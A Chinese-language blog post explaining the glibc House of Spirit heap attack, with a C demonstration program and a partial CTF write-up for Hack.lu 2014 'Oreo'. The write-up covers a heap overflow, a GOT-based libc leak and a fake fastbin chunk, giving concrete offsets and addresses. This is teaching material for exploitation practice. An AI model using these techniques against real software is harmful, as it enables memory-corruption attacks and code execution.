<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="个人总结的打印libc地址的几种方法 思路尝试 为了通过unsorted bin泄露libc，所以需要先构造一个unsroted binchunk，我用虚假free unsorted bin的方法，发现当一个chunk的大小是unsorted bin的时候，free它会报错，应该有一些检查，所以这条路走不通，除非能绕过这个检查走到这个里面了，应该是我没有选择合适的size，导致那个mmap那个标志">
<meta property="og:type" content="article">
<meta property="og:title" content="堆利用系列八：House of Spirit">
<meta property="og:url" content="https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/index.html">
<meta property="og:site_name" content="Colorlight&#39;s Blog">
<meta property="og:description" content="个人总结的打印libc地址的几种方法 思路尝试 为了通过unsorted bin泄露libc，所以需要先构造一个unsroted binchunk，我用虚假free unsorted bin的方法，发现当一个chunk的大小是unsorted bin的时候，free它会报错，应该有一些检查，所以这条路走不通，除非能绕过这个检查走到这个里面了，应该是我没有选择合适的size，导致那个mmap那个标志">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-06-10-20-36-20.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp//2021-06-11-10-20-40.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp//2021-06-15-09-11-00.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp//2021-06-15-09-51-20.png">
<meta property="article:published_time" content="2021-06-17T13:21:36.000Z">
<meta property="article:modified_time" content="2021-06-28T10:18:55.162Z">
<meta property="article:author" content="Colorlight">
<meta property="article:tag" content="堆利用">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://colorlight.github.io/images/heap_exp/2021-06-10-20-36-20.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>堆利用系列八：House of Spirit</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="Colorlight&#39;s Blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇 " href="/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B8%83%EF%BC%9ATcache-Attack/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&text=堆利用系列八：House of Spirit"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&is_video=false&description=堆利用系列八：House of Spirit"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=堆利用系列八：House of Spirit&body=Check out this article: https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&name=堆利用系列八：House of Spirit&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&t=堆利用系列八：House of Spirit"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%AA%E4%BA%BA%E6%80%BB%E7%BB%93%E7%9A%84%E6%89%93%E5%8D%B0libc%E5%9C%B0%E5%9D%80%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E6%B3%95"><span class="toc-number">1.</span> <span class="toc-text">个人总结的打印libc地址的几种方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF%E5%B0%9D%E8%AF%95"><span class="toc-number">2.</span> <span class="toc-text">思路尝试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">3.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-spirit%E4%BE%8B%E7%A8%8B"><span class="toc-number">4.</span> <span class="toc-text">house of spirit例程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hack-lu-2014-Oreo"><span class="toc-number">5.</span> <span class="toc-text">Hack.lu 2014 Oreo</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E5%BB%BA%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83"><span class="toc-number">5.1.</span> <span class="toc-text">构建调试环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%86%E5%90%91%E5%AE%A1%E8%AE%A1"><span class="toc-number">5.2.</span> <span class="toc-text">逆向审计</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">5.3.</span> <span class="toc-text">利用思路</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95fastbin%E6%94%BB%E5%87%BB"><span class="toc-number">5.3.1.</span> <span class="toc-text">尝试fastbin攻击</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80"><span class="toc-number">5.3.2.</span> <span class="toc-text">尝试泄露libc地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BB%93%E5%90%88%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%9C%AC%E8%BA%AB%E7%9A%84%E4%B8%9A%E5%8A%A1%E9%80%BB%E8%BE%91"><span class="toc-number">5.3.3.</span> <span class="toc-text">结合二进制本身的业务逻辑</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%88%91%E7%9A%84exp"><span class="toc-number">5.4.</span> <span class="toc-text">我的exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%93%E8%AF%AD"><span class="toc-number">6.</span> <span class="toc-text">结语</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">7.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        堆利用系列八：House of Spirit
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Colorlight</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-06-17T13:21:36.000Z" itemprop="datePublished">2021-06-17</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E5%A0%86%E5%88%A9%E7%94%A8/">堆利用</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E5%A0%86%E5%88%A9%E7%94%A8/" rel="tag">堆利用</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="个人总结的打印libc地址的几种方法"><a href="#个人总结的打印libc地址的几种方法" class="headerlink" title="个人总结的打印libc地址的几种方法"></a>个人总结的打印libc地址的几种方法</h2><p><img src="/images/heap_exp/2021-06-10-20-36-20.png"></p>
<h2 id="思路尝试"><a href="#思路尝试" class="headerlink" title="思路尝试"></a>思路尝试</h2><ol>
<li>为了通过unsorted bin泄露libc，所以需要先构造一个unsroted binchunk，我用虚假free unsorted bin的方法，发现当一个chunk的大小是unsorted bin的时候，free它会报错，应该有一些检查，所以这条路走不通，除非能绕过这个检查<br><img src="/images/heap_exp//2021-06-11-10-20-40.png"><br>走到这个里面了，应该是我没有选择合适的size，导致那个mmap那个标志位被置1 了，我觉着这样太麻烦了，不用太在意了，还是跟着主要的解题思路走，我们已经知道了这道题是需要用free一个fastbin的，这个是不需要检测那个标志位的  </li>
</ol>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>house of spirit攻击是一种构造虚假的chunk(通常是fast chunk)，free这个chunk把它放到fastbin上，然后通过再次申请得到对这个chunk的控制权。构造虚假chunk的时候需要注意两个size，一个是这个虚假chunk的size还有一个是紧邻chunk的size。在特殊的场景下可以进行应用。</p>
<h2 id="house-of-spirit例程"><a href="#house-of-spirit例程" class="headerlink" title="house of spirit例程"></a>house of spirit例程</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    puts(&quot;So we will be covering a House of Spirit Attack.&quot;);</span><br><span class="line">    puts(&quot;A House of Spirit Attack allows us to get malloc to return a fake chunk to a region we have some control over (such as the bss or stack).&quot;);</span><br><span class="line">    puts(&quot;In order for this attack to work and pass all of the malloc checks, we will need to make two fake chunks.&quot;);</span><br><span class="line">    puts(&quot;To setup the fake chunks, we will need to write fake size values for the chunks.&quot;);</span><br><span class="line">    puts(&quot;Also the first fake chunk is where we will want our chunk returned by malloc to be.&quot;);</span><br><span class="line">    puts(&quot;Let&#x27;s get started!\n&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    unsigned long array[20];</span><br><span class="line">    printf(&quot;So we start off by initializing our array on the stack.\n&quot;);</span><br><span class="line">    printf(&quot;Array Start: %p\n&quot;, array);</span><br><span class="line">    printf(&quot;Our goal will be to allocate a chunk at %p\n\n&quot;, &amp;array[2]);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    printf(&quot;Now we need to write our two size values for the chunks.\n&quot;);</span><br><span class="line">    printf(&quot;There are three restrictions we have to meet.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    printf(&quot;0.) Size of the chunks must be within the fast bin range.\n&quot;);</span><br><span class="line">    printf(&quot;1.) The size values must be placed where they should if they were an actual chunk.\n&quot;);</span><br><span class="line">    printf(&quot;2.) The size of the first heap chunk (the one that gets freed and reallocated) must be the same as the rounded up heap size of the malloc that we want to allocate our fake chunk.\n&quot;);</span><br><span class="line">    printf(&quot;That should be larger than the argument passed to malloc.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Also as a side note, the two sizes don&#x27;t have to be equal.\n&quot;);</span><br><span class="line">    printf(&quot;Check the code comments for how the fake heap chunks are structured.\n&quot;);</span><br><span class="line">    printf(&quot;With that, let&#x27;s write our two size values.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    /*</span><br><span class="line">    this will be the structure of our two fake chunks:</span><br><span class="line">    assuming that you compiled it for x64</span><br><span class="line"></span><br><span class="line">    +-------+---------------------+------+</span><br><span class="line">    | 0x00: | Chunk # 0 prev size | 0x00 |</span><br><span class="line">    +-------+---------------------+------+</span><br><span class="line">    | 0x08: | Chunk # 0 size      | 0x60 |</span><br><span class="line">    +-------+---------------------+------+</span><br><span class="line">    | 0x10: | Chunk # 0 content   | 0x00 |</span><br><span class="line">    +-------+---------------------+------+</span><br><span class="line">    | 0x60: | Chunk # 1 prev size | 0x00 |</span><br><span class="line">    +-------+---------------------+------+</span><br><span class="line">    | 0x68: | Chunk # 1 size      | 0x40 |</span><br><span class="line">    +-------+---------------------+------+</span><br><span class="line">    | 0x70: | Chunk # 1 content   | 0x00 |</span><br><span class="line">    +-------+---------------------+------+</span><br><span class="line"></span><br><span class="line">    for what we are doing the prev size values don&#x27;t matter too much</span><br><span class="line">    the important thing is the size values of the heap headers for our fake chunks</span><br><span class="line">    */</span><br><span class="line"></span><br><span class="line">    array[1] = 0x60;</span><br><span class="line">    array[13] = 0x40;</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now that we setup our fake chunks set up, we will now get a pointer to our first fake chunk.\n&quot;);</span><br><span class="line">    printf(&quot;This will be the ptr that we get malloc to return for this attack\n&quot;);</span><br><span class="line"></span><br><span class="line">    unsigned long *ptr;</span><br><span class="line">    ptr = &amp;(array[2]);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Address: %p\n\n&quot;, ptr);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now we will free the pointer to place it into the fast bin.\n&quot;);</span><br><span class="line"></span><br><span class="line">    free(ptr);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now we can just allocate a chunk that it&#x27;s rounded up malloc size will be equal to that of our fake chunk (0x60), and we should get malloc to return a pointer to array[1].\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    unsigned long *target;</span><br><span class="line">    target = malloc(0x50);</span><br><span class="line"></span><br><span class="line">    printf(&quot;returned pointer: %p\n&quot;, target);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Hack-lu-2014-Oreo"><a href="#Hack-lu-2014-Oreo" class="headerlink" title="Hack.lu 2014 Oreo"></a>Hack.lu 2014 Oreo</h2><p><a target="_blank" rel="noopener" href="https://github.com/guyinatuxedo/nightmare/tree/master/modules/39-house_of_spirit/hacklu14_oreo">文件链接</a>  </p>
<h3 id="构建调试环境"><a href="#构建调试环境" class="headerlink" title="构建调试环境"></a>构建调试环境</h3><p>首先看一下二进制和libc的情况. </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">file ./oreo</span><br><span class="line">ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.26, BuildID[sha1]=f591eececd05c63140b9d658578aea6c24450f8b, stripped</span><br></pre></td></tr></table></figure>
<p>可以发现这是一个32位的x86的二进制，而且这是一个可执行文件，就是加载地址是在固定的位置0x08048000。</p>
<p>链接给了一个libc.2.23的文件，但是我无法直接用pwntools中的process运行，均提示segment fault，尝试了几种方法最终通过运行ld文件，把二进制作为参数传给ld，然后指定LD_PRELOAD为libc.2.23的方法构建了调试环境。本文的调试主机环境为ubuntu18.04</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">target = process(argv=[&#x27;./ld-2.23.so&#x27;,&#x27;./oreo&#x27;], env=&#123;&quot;LD_PRELOAD&quot;:&quot;./libc.so.6&quot;&#125;)</span><br></pre></td></tr></table></figure>
<p>ld-2.23.so和libc.so.6是从glibc-all-in-one中下载的2.23版本的glibc文件，具体方法可参考我的前文。<br>至于为什么不能通过直接运行oreo二进制进行调试，我不太清楚原因，貌似是当oreo是可执行文件的时候，ld文件运行的时候有些问题，想通过调试确定一下问题，但是ld的逻辑太复杂，所以作罢，有更优雅的解决方案同学可以提示一下。</p>
<h3 id="逆向审计"><a href="#逆向审计" class="headerlink" title="逆向审计"></a>逆向审计</h3><p>通过逆向观察oreo二进制反编译代码，二进制有几个功能</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> case 1:</span><br><span class="line">    add_rifle();</span><br><span class="line">    break;</span><br><span class="line">  case 2:</span><br><span class="line">    show_added_rifles();</span><br><span class="line">    break;</span><br><span class="line">  case 3:</span><br><span class="line">    order_selected_rifles();</span><br><span class="line">    break;</span><br><span class="line">  case 4:</span><br><span class="line">    leave_message_with_order();</span><br><span class="line">    break;</span><br><span class="line">  case 5:</span><br><span class="line">    show_current_stats();</span><br><span class="line">    break;</span><br><span class="line">  case 6:</span><br><span class="line">    return __readgsdword(0x14u) ^ v1;</span><br><span class="line">  default:</span><br><span class="line">    continue;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>add_rifle就是相当于malloc创建一个chunk，show_added_rifles就是打印内存内容，而order_selected_rifles这个函数的功能是对所有创建的chunk进行free，还有一个函数是读取数据到一个bss段的全局变量<br>漏洞点也比较明显，在add_rifle中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mem_store_rifles = (char *)malloc(0x38u);  //创建0x38 + 8的chunk</span><br><span class="line"> if ( mem_store_rifles )</span><br><span class="line"> &#123;</span><br><span class="line">   *((_DWORD *)mem_store_rifles + 13) = v1;     // 把上一个chunk写入到新chunk中</span><br><span class="line">   printf(&quot;Rifle name: &quot;);</span><br><span class="line">   fgets(mem_store_rifles + 25, 56, stdin);   //写入的时候是从偏移25的地方再写入56个字节，堆溢出</span><br><span class="line">   sub_80485EC(mem_store_rifles + 25);</span><br><span class="line">   printf(&quot;Rifle description: &quot;);</span><br><span class="line">   fgets(mem_store_rifles, 56, stdin);</span><br><span class="line">   sub_80485EC(mem_store_rifles);</span><br><span class="line">   ++new_rifle_num;</span><br></pre></td></tr></table></figure>
<p>创建的chunk大小是0x40，但是写入的时候是从偏移25的位置再写入56个字节，这会造成堆溢出。<br>在这个函数中还有一个把旧的chunk指针写入到当前这个chunk中保存的逻辑，这个逻辑比较特殊应该会在后面的利用中用到。</p>
<h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><p>我本人尝试了几种思路一开始，但是都遇到了一些问题，首先这个创建chunk的大小都是固定的不是可控的，而且释放的时候也是根据链表进行全部释放，所以也不能随意的指定释放的顺序。这就给利用带来了一些困难。  </p>
<h4 id="尝试fastbin攻击"><a href="#尝试fastbin攻击" class="headerlink" title="尝试fastbin攻击"></a>尝试fastbin攻击</h4><p>通过溢出我们是可以通过fastbin 攻击把fastbin中的chunk的fd指针给修改到我们想要的地方，但是由于再次malloc的时候会验证chunk的size是否符合对应的fastbin size，我并没有在二进制中看到可以满足这个size的内存，所以这种方式比较难实现fastbin攻击，而且由于最终要借用system这种函数去实现拿shell，由于system函数没有在二进制中调用，所以最终还是要知道libc的加载地址才行。</p>
<h4 id="尝试泄露libc地址"><a href="#尝试泄露libc地址" class="headerlink" title="尝试泄露libc地址"></a>尝试泄露libc地址</h4><p>泄露libc地址的方式可以通过打印got表或者打印unsorted bin中的chunk的fd指针来实现，第一种打印got表需要劫持函数并且要求函数的参数是用户可控的，由于我们并不能实现对任意地址的写入功能，实现劫持函数就比较难实现，所以这种方法实现libc地址的难度较大。<br>尝试通过unsroted bin实现libc泄露也很困难，因为这个大小是0x40的chunk固定分配的，而0x40还是在fastbin的大小范围内，所以要想得到一个unsorted bin上的chunk就不容易，我想的是通过修改储存在当前chunk中的旧chunk的指针，让这个旧chunj指针指向一个虚假的地址，而且让-4偏移的内存作为假的size字段，但是我还是搜遍了二进制没有发现到很合适的size，能够不触发合并，而且没有让mmap标志位置1的内存，所以这种方式我也失败了。</p>
<p>数据结构图<br><img src="/images/heap_exp//2021-06-15-09-11-00.png"></p>
<h4 id="结合二进制本身的业务逻辑"><a href="#结合二进制本身的业务逻辑" class="headerlink" title="结合二进制本身的业务逻辑"></a>结合二进制本身的业务逻辑</h4><p>泄露libc地址的通用方法在这个二进制中非常困难，所以我们不得不考虑结合二进制本身的业务逻辑去做这个libc的地址泄露。这个二进制比较特殊的一个点是它把新旧chunk用链表的形式给串起来了，所以我们要充分利用这链表指针，因为这个指针我们是可以控制的，所以我们直接可以让这个链表指针指向我们的GOT表，通过打印逻辑把GOT表中的内容给打印出来。</p>
<p>我们可以让这个链表指针指向puts的got表地址0x0804A248，我们只需要控制分配的内容，覆盖这个指针。我们通过逆向add_rifle的逻辑可以发现，name这个字段是从偏移25的地方开始写入，然后可以写入56个字节，而我们的链表指针的偏移是52,所以我们的name可以写入27个字节之后，再写入的内容就是指针内容。</p>
<p>拿到了libc的地址后，我们就可以通过fastbin attack去修改malloc_hook和free_hook的值，但是同样的由于这两个地址附近都是没有可用的size的，got表附近也是没有可用的size，所以这题貌似通过简单的fastbin attack是行不通的，只能思考别的办法。</p>
<p>我们目标是修改GOT表，或者是函数指针的的值，但是目前我们没有这个条件，现在又卡到了我们，只能再去研究二进制，我们可以注意到还有一个leave message的函数我们是没有用到的，而这个函数是往一个指针指向的内存中写入数据，这个数据是我们可控的。而且发现存储这个指针的内存前面4个字节的内存内容也是可控的，他是表示创建的rifle的数目。所以思路出来了，如果我们能够修改这个指针，让他指向got表，就可以往got表中写入值了。</p>
<p>我们可以利用house of spirit实现修改这个指针。首先让这个rifle数目满足我们的0x40，然后free这个存储指针的地址，这样我们就在fastbin中添加了这个chunk，然后再malloc就可以得到对这个存储指针的地址的控制权，然后我们修改这个指针让他指向got表。</p>
<p>hof还有一个前置条件就是要修下一个紧邻chunk的size值，让他大于 2 * SIZE_SZ，否则会不满足glibc的校验条件。我们可控紧邻chunk的size在什么位置。假chunk的地址是0x804A2A0，大小是0x40，那么紧邻chunk的地址就是<code>0x0804A2A0 + 0x40 = 0x804a2e0</code>, 利用leave message这个函数是可以修改<code>0x0804A2C0 ~ 0x804A2C0 + 0x80</code>这块的地址的，下一个紧邻chunk的size字段相对于0x0804A2C0的偏移是<code>0x804a2e0 + 4 - 0x0804A2C0 = 0x24</code>, 因此我们通过写入0x24个字节的占位字节，然后和一个满足大于 2 * SIZE_SZ的假size字段就可以满足hos的条件。占位字节最好是NULL，只有这样才能在free链表指针的时候停下来。</p>
<p>经过这些操作我们可以得到一个虚假的0x40大小的fastbin chunk</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fastbins[idx=6, size=0x40]  ←  Chunk(addr=0x804a2a8, size=0x40, flags=PREV_INUSE)  ←  Chunk(addr=0x58252418, size=0x40, flags=PREV_INUSE)</span><br></pre></td></tr></table></figure>
<p>并且这个chunk的地址也是我们想要的0x804a2a8。</p>
